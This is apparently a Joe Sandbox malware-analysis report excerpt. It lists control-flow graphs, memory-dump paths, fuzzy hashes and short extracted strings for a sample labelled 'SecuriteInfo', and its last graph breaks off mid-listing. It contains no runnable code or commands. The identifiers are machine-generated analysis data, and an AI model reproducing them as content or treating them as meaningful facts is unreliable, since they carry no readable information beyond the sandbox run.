1693928-169393d 804->810 805->807 808 16938c6-16938d1 805->808 811 169393e-1693969 807->811 812 169390e-1693919 807->812 808->804 810->811 812->810
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Xq$Xq$Xq$Xq
                                                • API String ID: 0-3965792415
                                                • Opcode ID: 148311d1755092b66ee558b8be00f658742248c5cf909c0fbe79e2355d7e79bc
                                                • Instruction ID: b35737c1ab589c5b20f8232d7175e6660b29bd95fe6c180d80caca951365ad60
                                                • Opcode Fuzzy Hash: 148311d1755092b66ee558b8be00f658742248c5cf909c0fbe79e2355d7e79bc
                                                • Instruction Fuzzy Hash: 23C1C1319053599BCF2ACF78CDA1A5ABFFDFB89208F14559EC4059B361C7369902CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1958 6db9548-6db9577 1959 6db9579 1958->1959 1960 6db957e-6db9614 LdrInitializeThunk 1958->1960 1959->1960 1961 6db96b3-6db96b9 1960->1961 1962 6db9619-6db962c 1961->1962 1963 6db96bf-6db96d7 1961->1963 1964 6db962e 1962->1964 1965 6db9633-6db9684 1962->1965 1966 6db96eb-6db96fe 1963->1966 1967 6db96d9-6db96e6 1963->1967 1964->1965 1983 6db9697-6db96a9 1965->1983 1984 6db9686-6db9694 1965->1984 1969 6db9700 1966->1969 1970 6db9705-6db9721 1966->1970 1968 6db9a81-6db9b7e 1967->1968 1975 6db9b80-6db9b85 1968->1975 1976 6db9b86-6db9b90 1968->1976 1969->1970 1972 6db9728-6db974c 1970->1972 1973 6db9723 1970->1973 1979 6db974e 1972->1979 1980 6db9753-6db9785 1972->1980 1973->1972 1975->1976 1979->1980 1989 6db978c-6db97ce 1980->1989 1990 6db9787 1980->1990 1986 6db96ab 1983->1986 1987 6db96b0 1983->1987 1984->1963 1986->1987 1987->1961 1992 6db97d0 1989->1992 1993 6db97d5-6db97de 1989->1993 1990->1989 1992->1993 1994 6db9a06-6db9a0c 1993->1994 1995 6db97e3-6db9808 1994->1995 1996 6db9a12-6db9a25 1994->1996 1997 6db980a 1995->1997 1998 6db980f-6db9846 1995->1998 1999 6db9a2c-6db9a47 1996->1999 2000 6db9a27 1996->2000 1997->1998 2008 6db9848 1998->2008 2009 6db984d-6db987f 1998->2009 2001 6db9a49 1999->2001 2002 6db9a4e-6db9a62 1999->2002 2000->1999 2001->2002 2006 6db9a69-6db9a7f LdrInitializeThunk 2002->2006 2007 6db9a64 2002->2007 2006->1968 2007->2006 2008->2009 2011 6db98e3-6db98f6 2009->2011 2012 6db9881-6db98a6 2009->2012 2015 6db98f8 2011->2015 2016 6db98fd-6db9922 2011->2016 2013 6db98a8 2012->2013 2014 6db98ad-6db98db 2012->2014 2013->2014 2014->2011 2015->2016 2019 6db9931-6db9969 2016->2019 2020 6db9924-6db9925 2016->2020 2021 6db996b 2019->2021 2022 6db9970-6db99d1 call 6db9328 2019->2022 2020->1996 2021->2022 2028 6db99d8-6db99fc 2022->2028 2029 6db99d3 2022->2029 2032 6db99fe 2028->2032 2033 6db9a03 2028->2033 2029->2028 2032->2033 2033->1994
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: acabc061b7b8731ba21036dab6c776f77038da0ad7d8c623963d2b8efb7b297d
                                                • Instruction ID: 147e9a4aa421b184b8d9f1d46bc7199d998b8a5cf614321c4c6f9c2780aba80a
                                                • Opcode Fuzzy Hash: acabc061b7b8731ba21036dab6c776f77038da0ad7d8c623963d2b8efb7b297d
                                                • Instruction Fuzzy Hash: 12F1F174E00258CFEB54DFA9C884B9DBBF2BF89304F5481A9D809AB395DB709985CF50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (oq$Hq
                                                • API String ID: 0-2917151738
                                                • Opcode ID: 17ef629f7c3537d99257333a03d3f3d45862e97983c6064bd64fa29eccbf4e56
                                                • Instruction ID: 50ae92f15cc745a5812f4c921375d66d55ff5a8de726530c9b43e35844efff81
                                                • Opcode Fuzzy Hash: 17ef629f7c3537d99257333a03d3f3d45862e97983c6064bd64fa29eccbf4e56
                                                • Instruction Fuzzy Hash: 64128D71A002198FDB15DF69D854BAEBBF6FF88300F148569E80ADB395DB349D42CB90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2299 1693e09-1693e25 2300 1693e2e-1693e3e 2299->2300 2301 1693e27-1693e29 2299->2301 2303 1693e40 2300->2303 2304 1693e45-1693e55 2300->2304 2302 16940cc-16940d3 2301->2302 2303->2302 2306 1693e5b-1693e69 2304->2306 2307 16940b3-16940c1 2304->2307 2310 1693e6f 2306->2310 2311 16940d4-1694152 2306->2311 2307->2311 2312 16940c3-16940c7 call 16902c8 2307->2312 2310->2311 2313 1693e8d-1693eae 2310->2313 2314 1693f4c-1693f6d 2310->2314 2315 1693fcc-1694009 2310->2315 2316 169400e-1694034 2310->2316 2317 1693f00-1693f21 2310->2317 2318 1694084-16940a5 call 16928f0 2310->2318 2319 1694067-1694082 call 16902d8 2310->2319 2320 16940a7-16940b1 2310->2320 2321 1693f26-1693f47 2310->2321 2322 1694039-1694065 2310->2322 2323 1693eda-1693efb 2310->2323 2324 1693f9f-1693fc7 2310->2324 2325 1693eb3-1693ed5 2310->2325 2326 1693f72-1693f9a 2310->2326 2327 1693e76-1693e88 2310->2327 2312->2302 2313->2302 2314->2302 2315->2302 2316->2302 2317->2302 2318->2302 2319->2302 2320->2302 2321->2302 2322->2302 2323->2302 2324->2302 2325->2302 2326->2302 2327->2302
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Xq$$q
                                                • API String ID: 0-855381642
                                                • Opcode ID: d6ed73b83a01f617a8caa077e2b9991ba97d23030c65fa5efcc71c4e19e5c5b6
                                                • Instruction ID: 917bfd3e2949f744e95e8f05ada566187843cd0d40870ca6457f544f9a6e1e28
                                                • Opcode Fuzzy Hash: d6ed73b83a01f617a8caa077e2b9991ba97d23030c65fa5efcc71c4e19e5c5b6
                                                • Instruction Fuzzy Hash: 46918230B04219DFDF19EBB5996427E7BA7BFC8301B05852EE406DB398CE3988038795

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2549 169c147-169c158 2550 169c15a-169c172 2549->2550 2551 169c184 2549->2551 2555 169c17b-169c17e 2550->2555 2556 169c174-169c179 2550->2556 2552 169c186-169c18a 2551->2552 2557 169c18b-169c199 2555->2557 2558 169c180-169c182 2555->2558 2556->2552 2560 169c19b-169c19d 2557->2560 2561 169c1a6-169c1a7 2557->2561 2558->2550 2558->2551 2562 169c1aa-169c1ac 2560->2562 2563 169c19f-169c1a1 2560->2563 2561->2562 2564 169c1ae-169c1c8 2562->2564 2563->2564 2565 169c1a3 2563->2565 2566 169c1ca 2564->2566 2567 169c1cf-169c2ac call 16941a0 call 1693cc0 2564->2567 2565->2561 2566->2567 2577 169c2ae 2567->2577 2578 169c2b3-169c2d4 call 1695658 2567->2578 2577->2578 2580 169c2d9-169c2e4 2578->2580 2581 169c2eb-169c2ef 2580->2581 2582 169c2e6 2580->2582 2583 169c2f1-169c2f2 2581->2583 2584 169c2f4-169c2fb 2581->2584 2582->2581 2585 169c313-169c357 2583->2585 2586 169c2fd 2584->2586 2587 169c302-169c310 2584->2587 2591 169c3bd-169c3d4 2585->2591 2586->2587 2587->2585 2593 169c359-169c36f 2591->2593 2594 169c3d6-169c3fb 2591->2594 2598 169c399 2593->2598 2599 169c371-169c37d 2593->2599 2600 169c3fd-169c412 2594->2600 2601 169c413 2594->2601 2604 169c39f-169c3bc 2598->2604 2602 169c37f-169c385 2599->2602 2603 169c387-169c38d 2599->2603 2600->2601 2605 169c397 2602->2605 2603->2605 2604->2591 2605->2604
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq$PHq
                                                • API String ID: 0-1274609152
                                                • Opcode ID: 3a73b2b567298d68ffe06c95180a6a68c5bb7ed3e9745dd5598c13c5ab7e5af9
                                                • Instruction ID: 6d4e261a9542bd9d90f7b7ac80864785ac28219e56a2d454e058b4172e31d66c
                                                • Opcode Fuzzy Hash: 3a73b2b567298d68ffe06c95180a6a68c5bb7ed3e9745dd5598c13c5ab7e5af9
                                                • Instruction Fuzzy Hash: 07A1C675E00218CFEB14CFAAD984A9DBBF6BF89310F14806AE409AB361DB319941CF55

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2609 1695362-1695364 2610 16953c4-1695484 call 16941a0 call 1693cc0 2609->2610 2611 1695366-16953a0 2609->2611 2623 169548b-16954a9 2610->2623 2624 1695486 2610->2624 2612 16953a2 2611->2612 2613 16953a7-16953c2 2611->2613 2612->2613 2613->2610 2654 16954ac call 1695649 2623->2654 2655 16954ac call 1695658 2623->2655 2624->2623 2625 16954b2-16954bd 2626 16954bf 2625->2626 2627 16954c4-16954c8 2625->2627 2626->2627 2628 16954ca-16954cb 2627->2628 2629 16954cd-16954d4 2627->2629 2630 16954ec-1695530 2628->2630 2631 16954db-16954e9 2629->2631 2632 16954d6 2629->2632 2636 1695596-16955ad 2630->2636 2631->2630 2632->2631 2638 16955af-16955d4 2636->2638 2639 1695532-1695548 2636->2639 2646 16955ec 2638->2646 2647 16955d6-16955eb 2638->2647 2643 169554a-1695556 2639->2643 2644 1695572 2639->2644 2648 1695558-169555e 2643->2648 2649 1695560-1695566 2643->2649 2645 1695578-1695595 2644->2645 2645->2636 2647->2646 2650 1695570 2648->2650 2649->2650 2650->2645 2654->2625 2655->2625
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq$PHq
                                                • API String ID: 0-1274609152
                                                • Opcode ID: 26cd79b1e6555928689a7876d7648e8036ff4b18263a8acd64fd19d09aff0877
                                                • Instruction ID: f86f1ec00bb2bcdf1f14e6349e0301b426a0aad7220de5d76d16e6659c6f5492
                                                • Opcode Fuzzy Hash: 26cd79b1e6555928689a7876d7648e8036ff4b18263a8acd64fd19d09aff0877
                                                • Instruction Fuzzy Hash: 0391C274E00218CFDF15CFAAD984A9DBBF2BF89310F14806AE809AB365DB319945CF51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2656 169d278-169d2a8 2657 169d2aa 2656->2657 2658 169d2af-169d38c call 16941a0 call 1693cc0 2656->2658 2657->2658 2668 169d38e 2658->2668 2669 169d393-169d3b4 call 1695658 2658->2669 2668->2669 2671 169d3b9-169d3c4 2669->2671 2672 169d3cb-169d3cf 2671->2672 2673 169d3c6 2671->2673 2674 169d3d1-169d3d2 2672->2674 2675 169d3d4-169d3db 2672->2675 2673->2672 2676 169d3f3-169d437 2674->2676 2677 169d3dd 2675->2677 2678 169d3e2-169d3f0 2675->2678 2682 169d49d-169d4b4 2676->2682 2677->2678 2678->2676 2684 169d439-169d44f 2682->2684 2685 169d4b6-169d4db 2682->2685 2689 169d479 2684->2689 2690 169d451-169d45d 2684->2690 2692 169d4dd-169d4f2 2685->2692 2693 169d4f3 2685->2693 2691 169d47f-169d49c 2689->2691 2694 169d45f-169d465 2690->2694 2695 169d467-169d46d 2690->2695 2691->2682 2692->2693 2696 169d477 2694->2696 2695->2696 2696->2691
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq$PHq
                                                • API String ID: 0-1274609152
                                                • Opcode ID: b7ebedc6b9fa07bd7deef7d43009c9b95bcbaab68f165382449b505433a12391
                                                • Instruction ID: 36ebf704571c6612f0dfe2e53ab6342c29609e3bf83a3d23fb3da05d58389759
                                                • Opcode Fuzzy Hash: b7ebedc6b9fa07bd7deef7d43009c9b95bcbaab68f165382449b505433a12391
                                                • Instruction Fuzzy Hash: F781A074E01218CFEB14DFAAD984A9DBBF2BF89300F14D069E819AB365DB309945CF51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2700 169ca08-169ca38 2702 169ca3a 2700->2702 2703 169ca3f-169cb1c call 16941a0 call 1693cc0 2700->2703 2702->2703 2713 169cb1e 2703->2713 2714 169cb23-169cb44 call 1695658 2703->2714 2713->2714 2716 169cb49-169cb54 2714->2716 2717 169cb5b-169cb5f 2716->2717 2718 169cb56 2716->2718 2719 169cb61-169cb62 2717->2719 2720 169cb64-169cb6b 2717->2720 2718->2717 2721 169cb83-169cbc7 2719->2721 2722 169cb6d 2720->2722 2723 169cb72-169cb80 2720->2723 2727 169cc2d-169cc44 2721->2727 2722->2723 2723->2721 2729 169cbc9-169cbdf 2727->2729 2730 169cc46-169cc6b 2727->2730 2734 169cc09 2729->2734 2735 169cbe1-169cbed 2729->2735 2737 169cc6d-169cc82 2730->2737 2738 169cc83 2730->2738 2736 169cc0f-169cc2c 2734->2736 2739 169cbef-169cbf5 2735->2739 2740 169cbf7-169cbfd 2735->2740 2736->2727 2737->2738 2741 169cc07 2739->2741 2740->2741 2741->2736
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq$PHq
                                                • API String ID: 0-1274609152
                                                • Opcode ID: 9f07d5763564249688cd2ea9d2726d1dfcc50e90e518939f214ba44d348a70fa
                                                • Instruction ID: 4e9cf56c6f6a28cc59e0a79b92dac9bf21abc8be4a3acf8e365372495d88d5ba
                                                • Opcode Fuzzy Hash: 9f07d5763564249688cd2ea9d2726d1dfcc50e90e518939f214ba44d348a70fa
                                                • Instruction Fuzzy Hash: 53819274E00258CFEF14DFAAD984A9DBBF6BF89310F148069E419AB365DB309942CF51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2745 169ccd8-169cd08 2746 169cd0a 2745->2746 2747 169cd0f-169cdec call 16941a0 call 1693cc0 2745->2747 2746->2747 2757 169cdee 2747->2757 2758 169cdf3-169ce14 call 1695658 2747->2758 2757->2758 2760 169ce19-169ce24 2758->2760 2761 169ce2b-169ce2f 2760->2761 2762 169ce26 2760->2762 2763 169ce31-169ce32 2761->2763 2764 169ce34-169ce3b 2761->2764 2762->2761 2765 169ce53-169ce97 2763->2765 2766 169ce3d 2764->2766 2767 169ce42-169ce50 2764->2767 2771 169cefd-169cf14 2765->2771 2766->2767 2767->2765 2773 169ce99-169ceaf 2771->2773 2774 169cf16-169cf3b 2771->2774 2778 169ced9 2773->2778 2779 169ceb1-169cebd 2773->2779 2781 169cf3d-169cf52 2774->2781 2782 169cf53 2774->2782 2780 169cedf-169cefc 2778->2780 2783 169cebf-169cec5 2779->2783 2784 169cec7-169cecd 2779->2784 2780->2771 2781->2782 2785 169ced7 2783->2785 2784->2785 2785->2780
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq$PHq
                                                • API String ID: 0-1274609152
                                                • Opcode ID: 933a7e16340df0227bcd72b641ecaf6fe2730214378b30346213a9e61eef6202
                                                • Instruction ID: 3f3d0715d2336c9191142356e2007658dd0f764c8e4823217efe48301e352f89
                                                • Opcode Fuzzy Hash: 933a7e16340df0227bcd72b641ecaf6fe2730214378b30346213a9e61eef6202
                                                • Instruction Fuzzy Hash: 54819174E00218DFEB14DFAAD984A9DBBF2BF89300F14C069E419AB365DB309946CF51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq$PHq
                                                • API String ID: 0-1274609152
                                                • Opcode ID: 4981c0e87f57bfdde1e591e81b594702f7965892e198a40bd647410df0c8fa27
                                                • Instruction ID: b8740412e5747fdc397999a8b154cb50f99763da23956ce62e2b3b25a663d40a
                                                • Opcode Fuzzy Hash: 4981c0e87f57bfdde1e591e81b594702f7965892e198a40bd647410df0c8fa27
                                                • Instruction Fuzzy Hash: 7A81A274E00218DFEF14DFAAD984A9DBBF6BF89311F148069E409AB365DB309942CF11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq$PHq
                                                • API String ID: 0-1274609152
                                                • Opcode ID: 6a45f3663b2baaf9b2cc08aa64a69b8133d2b266aa5577ca9074b8e55d8538d1
                                                • Instruction ID: fcefa5c2b70f29087dc415134d4ec2c0fe05dcb1137fa69d5c7fe4ba19e1b306
                                                • Opcode Fuzzy Hash: 6a45f3663b2baaf9b2cc08aa64a69b8133d2b266aa5577ca9074b8e55d8538d1
                                                • Instruction Fuzzy Hash: 62819374E00218CFEB14DFAAD984A9DBBF6BF89310F14C06AE419AB365DB305942CF51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq$PHq
                                                • API String ID: 0-1274609152
                                                • Opcode ID: 1aa17f23b9241f5061123d5af4eee0166542bb0117aed6ea8edd6b251d423772
                                                • Instruction ID: 8c15d3b66217d93f0d4d0a600b7f483454fced7a4ffbce395ea08890dd6e329c
                                                • Opcode Fuzzy Hash: 1aa17f23b9241f5061123d5af4eee0166542bb0117aed6ea8edd6b251d423772
                                                • Instruction Fuzzy Hash: 5481A374E00218DFEF14DFAAD984A9DBBF2BF88300F14906AE419AB365DB309941CF50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 165135b85f0b300babe9f3caf6f58007105ea6b89eb15d49ff46b62cf80d2775
                                                • Instruction ID: 375f7e42100c653db6099f00023c0acc0908575286797043a82bf3e3c7411d3f
                                                • Opcode Fuzzy Hash: 165135b85f0b300babe9f3caf6f58007105ea6b89eb15d49ff46b62cf80d2775
                                                • Instruction Fuzzy Hash: 4791D071E00248CFDB58DFB9C9546DDBBF2AF89210F10956AD55AAB398DB348C02CB94
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d3df20eb301270e4e9076617ffbb2e95b3720ec46e51c5c3753503009fb1310
                                                • Instruction ID: d9c8288a2feab08bef5acab06c1118fb7b317bc04114382ace342f735688fe5c
                                                • Opcode Fuzzy Hash: 6d3df20eb301270e4e9076617ffbb2e95b3720ec46e51c5c3753503009fb1310
                                                • Instruction Fuzzy Hash: 5E72AC74E01228CFDB64DF69C994BD9BBB2BB49300F1491E9D449A7355EB349E81CF80
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bbb5211e99f0d73b987b721df78c94c1c4ca33834dee2aacf7244e32102c212
                                                • Instruction ID: f800afd6cab006267ab333c389d2061c86e4d7b4a051df0d3986ffd60232b705
                                                • Opcode Fuzzy Hash: 0bbb5211e99f0d73b987b721df78c94c1c4ca33834dee2aacf7244e32102c212
                                                • Instruction Fuzzy Hash: 48C18E78E01218CFDB54DFA9D954B9DBBB2FB88301F1081A9D809AB354DB359E85CF50
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2830f1f083d32b87f7237fe9cce40a0896a41dce89091f2301b97a8d1c2e2d90
                                                • Instruction ID: ebc5a38a3247f6d6599a7de43337c6eeda4a38033361fe12317af3af268a2f73
                                                • Opcode Fuzzy Hash: 2830f1f083d32b87f7237fe9cce40a0896a41dce89091f2301b97a8d1c2e2d90
                                                • Instruction Fuzzy Hash: 3AA11374D00208CFEB14DFA9C844BEDBBB1FF88314F209269E409AB2A5DB759985CF55
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb4f526ae664459b70c1aa625b2231375cd64cece2280dd32cca2560de1f63c0
                                                • Instruction ID: f5c5397cefef632aefb798ee96f9c89b1f7dd9dbacca4cfbf617cc9c37af4a12
                                                • Opcode Fuzzy Hash: bb4f526ae664459b70c1aa625b2231375cd64cece2280dd32cca2560de1f63c0
                                                • Instruction Fuzzy Hash: 79A11374D00208CFEB14DFA9C944BEDBBB1FF88310F209269E409AB2A5DB759985CF55
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3854683353.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6db0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e605ec63749018ecca4bca233e439efcc04264181521c8792946ce71a549ed33
                                                • Instruction ID: 08089504d1d2523b39672ffd630e27a939765b2be85d3c27efc1fc33ec222ebb
                                                • Opcode Fuzzy Hash: e605ec63749018ecca4bca233e439efcc04264181521c8792946ce71a549ed33
                                                • Instruction Fuzzy Hash: 20910274D00208CFEB50DFA9C854BECBBB1FF49310F249269E409AB295DB759985CF64
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ff4f34da4542427b328b1a5566192a4034c0d1a5fce42f835a453615592eee2
                                                • Instruction ID: 778a110579dc8871307eb26fb3d682407dea1148fa8661af3a7befecdc015d5b
                                                • Opcode Fuzzy Hash: 7ff4f34da4542427b328b1a5566192a4034c0d1a5fce42f835a453615592eee2
                                                • Instruction Fuzzy Hash: 5E519674E00208DFDB18DFAAD994A9DBBB6FF89310F24D129E815AB364DB355842CF14
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0dad9b345e7db3d67ef594743093ce21951bd6472872cd46c6c10f2737866f7c
                                                • Instruction ID: dda4e1d7409125e0a5ab870a50250b54f44e9064f512f3c628e6e16fb53e51d8
                                                • Opcode Fuzzy Hash: 0dad9b345e7db3d67ef594743093ce21951bd6472872cd46c6c10f2737866f7c
                                                • Instruction Fuzzy Hash: B4519774E00308DFDB18DFAAD994A9DBBB6FF89300F248129E815AB364DB355841CF54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 16976f1-1697725 1 169772b-169774e 0->1 2 1697b54-1697b58 0->2 11 16977fc-1697800 1->11 12 1697754-1697761 1->12 3 1697b5a-1697b6e 2->3 4 1697b71-1697b7f 2->4 9 1697b81-1697b96 4->9 10 1697bf0-1697c05 4->10 18 1697b98-1697b9b 9->18 19 1697b9d-1697baa 9->19 20 1697c0c-1697c19 10->20 21 1697c07-1697c0a 10->21 15 1697848-1697851 11->15 16 1697802-1697810 11->16 24 1697770 12->24 25 1697763-169776e 12->25 22 1697c67 15->22 23 1697857-1697861 15->23 16->15 36 1697812-169782d 16->36 26 1697bac-1697bed 18->26 19->26 27 1697c1b-1697c56 20->27 21->27 30 1697c6c-1697c9c 22->30 23->2 28 1697867-1697870 23->28 31 1697772-1697774 24->31 25->31 76 1697c5d-1697c64 27->76 34 169787f-169788b 28->34 35 1697872-1697877 28->35 63 1697c9e-1697cb4 30->63 64 1697cb5-1697cbc 30->64 31->11 39 169777a-16977dc 31->39 34->30 37 1697891-1697897 34->37 35->34 57 169783b 36->57 58 169782f-1697839 36->58 42 169789d-16978ad 37->42 43 1697b3e-1697b42 37->43 88 16977de 39->88 89 16977e2-16977f9 39->89 55 16978af-16978bf 42->55 56 16978c1-16978c3 42->56 43->22 47 1697b48-1697b4e 43->47 47->2 47->28 61 16978c6-16978cc 55->61 56->61 62 169783d-169783f 57->62 58->62 61->43 70 16978d2-16978e1 61->70 62->15 71 1697841 62->71 73 169798f-16979ba call 1697538 * 2 70->73 74 16978e7 70->74 71->15 93 16979c0-16979c4 73->93 94 1697aa4-1697abe 73->94 78 16978ea-16978fb 74->78 78->30 80 1697901-1697913 78->80 80->30 83 1697919-1697931 80->83 145 1697933 call 16980d8 83->145 146 1697933 call 1698055 83->146 147 1697933 call 1697fe4 83->147 148 1697933 call 1697fa4 83->148 86 1697939-1697949 86->43 87 169794f-1697952 86->87 91 169795c-169795f 87->91 92 1697954-169795a 87->92 88->89 89->11 91->22 96 1697965-1697968 91->96 92->91 92->96 93->43 95 16979ca-16979ce 93->95 94->2 112 1697ac4-1697ac8 94->112 99 16979d0-16979dd 95->99 100 16979f6-16979fc 95->100 101 169796a-169796e 96->101 102 1697970-1697973 96->102 115 16979ec 99->115 116 16979df-16979ea 99->116 104 16979fe-1697a02 100->104 105 1697a37-1697a3d 100->105 101->102 103 1697979-169797d 101->103 102->22 102->103 103->22 110 1697983-1697989 103->110 104->105 111 1697a04-1697a0d 104->111 107 1697a49-1697a4f 105->107 108 1697a3f-1697a43 105->108 113 1697a5b-1697a5d 107->113 114 1697a51-1697a55 107->114 108->76 108->107 110->73 110->78 117 1697a1c-1697a32 111->117 118 1697a0f-1697a14 111->118 119 1697aca-1697ad4 call 16963e0 112->119 120 1697b04-1697b08 112->120 121 1697a5f-1697a68 113->121 122 1697a92-1697a94 113->122 114->43 114->113 123 16979ee-16979f0 115->123 116->123 117->43 118->117 119->120 133 1697ad6-1697aeb 119->133 120->76 125 1697b0e-1697b12 120->125 128 1697a6a-1697a6f 121->128 129 1697a77-1697a8d 121->129 122->43 130 1697a9a-1697aa1 122->130 123->43 123->100 